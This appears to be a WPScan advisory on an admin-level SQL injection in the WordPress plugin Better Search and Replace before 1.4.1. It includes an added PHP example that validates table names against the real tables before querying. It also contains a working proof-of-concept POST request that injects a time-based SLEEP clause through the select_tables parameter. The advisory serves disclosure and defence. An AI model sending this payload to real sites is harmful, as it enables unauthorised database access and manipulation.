wpvulndb
WPVDB-ID: 229A065E-1062-44D4-818D-29AA3B6B6D41
Author: Christiaan Swiers
History: Aug 01, 2022 - 12:00 a.m.

Better Search and Replace < 1.4.1 - Admin+ SQLi

Published: 2022-08-01 00:00:00
Author: Christiaan Swiers
Source: wpscan.com
Tags: sql injection, better search and replace, admin+

EPSS: 0.001 (Low), percentile 32.2%

The plugin does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high privilege users (admin+) to perform SQL Injection attacks.
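As an added illustration of the defensive side (example code written for this page, not the plugin's own code or its actual fix): a hypothetical PHP handler that only accepts table names which really exist in the database before they reach a query, using the constructed table list and the injected name from the PoC request as sample input. The function and variable names are assumptions.

```php
<?php
// Added example (not the plugin's code): a hypothetical handler that takes
// the user-supplied select_tables[] list and only accepts names that exist
// in the database, so a table "name" can never carry SQL into the query.

/**
 * Return only those requested names that are real tables in this database.
 * $existing is normally $wpdb->get_col( 'SHOW TABLES' ); it is passed in here
 * so the function can be exercised without a live WordPress install.
 */
function bsr_example_filter_tables( array $requested, array $existing ): array {
    $allowed = array_fill_keys( $existing, true );
    $safe    = array();
    foreach ( $requested as $name ) {
        if ( ! is_string( $name ) ) {
            continue;
        }
        // Exact match against the allowlist: anything with a backtick, space
        // or SQL fragment appended is simply not a table name and is dropped.
        if ( isset( $allowed[ $name ] ) ) {
            $safe[] = $name;
        }
    }
    return $safe;
}

/**
 * Build the row-fetch query for one already-validated table. The name is
 * wrapped in backticks with any embedded backtick doubled, which is how
 * MySQL quotes identifiers (wpdb::prepare() only handles values, not names).
 */
function bsr_example_select_sql( string $table, int $offset, int $limit ): string {
    $ident = '`' . str_replace( '`', '``', $table ) . '`';
    return sprintf( 'SELECT * FROM %s LIMIT %d, %d', $ident, $offset, $limit );
}

// Constructed input modelled on the PoC request: one genuine table plus one
// name that smuggles a WHERE clause after a closing backtick. Only names
// present in $existing survive the filter.
$existing  = array( 'wp_posts', 'wp_options', 'wp_users' );
$requested = array( 'wp_posts', 'wp_posts` WHERE 1=SLEEP(1) -- ' );

foreach ( bsr_example_filter_tables( $requested, $existing ) as $t ) {
    echo bsr_example_select_sql( $t, 0, 1000 ), PHP_EOL;
}
```

The allowlist check is the important part: identifier quoting alone still leaves the query at the mercy of whatever string the request supplied.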

PoC

POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 369
Connection: close
Cookie: [admin+]

bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20–%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace

Affected software (CPE):

Name                   | Operator | Version
-----------------------|----------|--------
better-search-replace  | lt       | 1.4.1
